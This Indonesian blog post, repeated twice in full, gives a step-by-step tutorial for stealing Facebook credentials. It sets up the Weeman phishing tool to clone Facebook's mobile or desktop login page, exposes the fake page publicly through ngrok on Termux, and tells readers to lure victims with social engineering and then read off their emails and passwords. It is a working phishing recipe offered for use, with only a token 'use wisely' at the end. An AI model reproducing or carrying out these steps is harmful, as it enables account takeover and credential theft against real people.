Cara Hack Facebook Dengan Weeman (phishing) dan Ngrok di Termux 2019 - Maxteroit
Cara Hack Facebook Dengan Weeman dan Ngrok di TERMUX

Cara Hack Facebook Dengan Weeman (phishing) dan Ngrok 2019 - Banyak sekali cara hack facebook dari tahun ke tahun dari mulai methode Bruteforce hingga phising . Keberhasilan hack facebook dengan cara membobol password menggunakan Bruteforce sangat lah kecil . Ya semua tergantung dari wordlist mu. Cara yang paling efektif ialah menggunakan teknik phishing. Kita hanya perlu membuat sebuah url login page yg telah di modifikasi diberi log . Tapi itu membutuhkan hosting dan domain . Kali ini saya akan memberi cara membuat phising dengan weeman dan sangat mudah . Mudah bahan maksudnya wkwkw . walaupun agak sedikit ribet pada prosesnya .

Langsung saja ikuti tahapnya .

Gunakan VPN apa saja sebelum menggunakan ngrok . Agar ngrok tidak bermasalah
Kalian bisa cari vpn apa saja di playstore
lanjut ke tahap selanjutnya.

Clone Tools weeman dengan command:
$ git clone https://github.com/evait-security/weeman.git
$ cd weeman
$ python2 weeman.py

Nah sekarang atur tools pada weeman . ikuti command berikut:
weeman > set url http://m.facebook.com
weeman > set action_url http://m.facebook.com/login.php

Jika target anda menggunakan desktop . ubah url menjadi http://facebook.com
dan action_url http://facebook.com/login.php

Semua sudah di set langsung jalankan dengan command:
weeman > run


Selanjutnya kita install ngrok dulu, daftar pada https://ngrok.com atau bisa juga
login menggunakan akun google dan github . 

Pilih download


Pilih Linux(ARM)




Buka session baru lalu masuk pada folder penyimpanan hasil download tadi dan ekstrak file zip ngrok :
$ cd storage/shared/Download
$ unzip ngrok-stable-linux-arm.zip
$ mv -v ngrok $HOME
$ cd
$ chmod +x ngrok
*NOTE : Nama partisi sdcard berbeda tiap jenis phonsel . jadi sesuaikan saja
kebanyakan bernama ~/sdcard . Jika kalian belum setting storage . setting dengan command :
$ termux-setup-storage
dan berikan ijin untuk mengakses sdcard


Lalu kita buka kembali website ngrok . dan copy authtoken nya dan paste:


$ ./ngrok authtoken TOKENMU

Lanjut :
$ ./ngrok http 8080

Akan muncul seperti ini : 

Copy forwardingnya :

Sebarkan atau pancing menggunakan tipu muslihat mu . kalo bahasa kerennya Social Engineering wkwkwkw .
Mari kita test, apakah ini berjala  atau tidak .
Pastekan url forwarder dari ngrok tadi 
Coba test login oleh mu . 

Nah mulai lah cari email/username dan passwordnya 


Ketemu kan . sekian tutorial Cara Hack Facebook Dengan Weeman Dan Ngrok di Termux . Gunakanlah dengan bijak.

Cara Hack Facebook Dengan Weeman (phishing) dan Ngrok di Termux 2019

Cara Hack Facebook Dengan Weeman dan Ngrok di TERMUX

Cara Hack Facebook Dengan Weeman (phishing) dan Ngrok 2019 - Banyak sekali cara hack facebook dari tahun ke tahun dari mulai methode Bruteforce hingga phising . Keberhasilan hack facebook dengan cara membobol password menggunakan Bruteforce sangat lah kecil . Ya semua tergantung dari wordlist mu. Cara yang paling efektif ialah menggunakan teknik phishing. Kita hanya perlu membuat sebuah url login page yg telah di modifikasi diberi log . Tapi itu membutuhkan hosting dan domain . Kali ini saya akan memberi cara membuat phising dengan weeman dan sangat mudah . Mudah bahan maksudnya wkwkw . walaupun agak sedikit ribet pada prosesnya .

Langsung saja ikuti tahapnya .

Gunakan VPN apa saja sebelum menggunakan ngrok . Agar ngrok tidak bermasalah
Kalian bisa cari vpn apa saja di playstore
lanjut ke tahap selanjutnya.

Clone Tools weeman dengan command:
$ git clone https://github.com/evait-security/weeman.git
$ cd weeman
$ python2 weeman.py

Nah sekarang atur tools pada weeman . ikuti command berikut:
weeman > set url http://m.facebook.com
weeman > set action_url http://m.facebook.com/login.php

Jika target anda menggunakan desktop . ubah url menjadi http://facebook.com
dan action_url http://facebook.com/login.php

Semua sudah di set langsung jalankan dengan command:
weeman > run


Selanjutnya kita install ngrok dulu, daftar pada https://ngrok.com atau bisa juga
login menggunakan akun google dan github . 

Pilih download


Pilih Linux(ARM)




Buka session baru lalu masuk pada folder penyimpanan hasil download tadi dan ekstrak file zip ngrok :
$ cd storage/shared/Download
$ unzip ngrok-stable-linux-arm.zip
$ mv -v ngrok $HOME
$ cd
$ chmod +x ngrok
*NOTE : Nama partisi sdcard berbeda tiap jenis phonsel . jadi sesuaikan saja
kebanyakan bernama ~/sdcard . Jika kalian belum setting storage . setting dengan command :
$ termux-setup-storage
dan berikan ijin untuk mengakses sdcard


Lalu kita buka kembali website ngrok . dan copy authtoken nya dan paste:


$ ./ngrok authtoken TOKENMU

Lanjut :
$ ./ngrok http 8080

Akan muncul seperti ini : 

Copy forwardingnya :

Sebarkan atau pancing menggunakan tipu muslihat mu . kalo bahasa kerennya Social Engineering wkwkwkw .
Mari kita test, apakah ini berjala  atau tidak .
Pastekan url forwarder dari ngrok tadi 
Coba test login oleh mu . 

Nah mulai lah cari email/username dan passwordnya 


Ketemu kan . sekian tutorial Cara Hack Facebook Dengan Weeman Dan Ngrok di Termux . Gunakanlah dengan bijak.
Baca Juga

Share This

Related Post

Subscribe Our Newsletter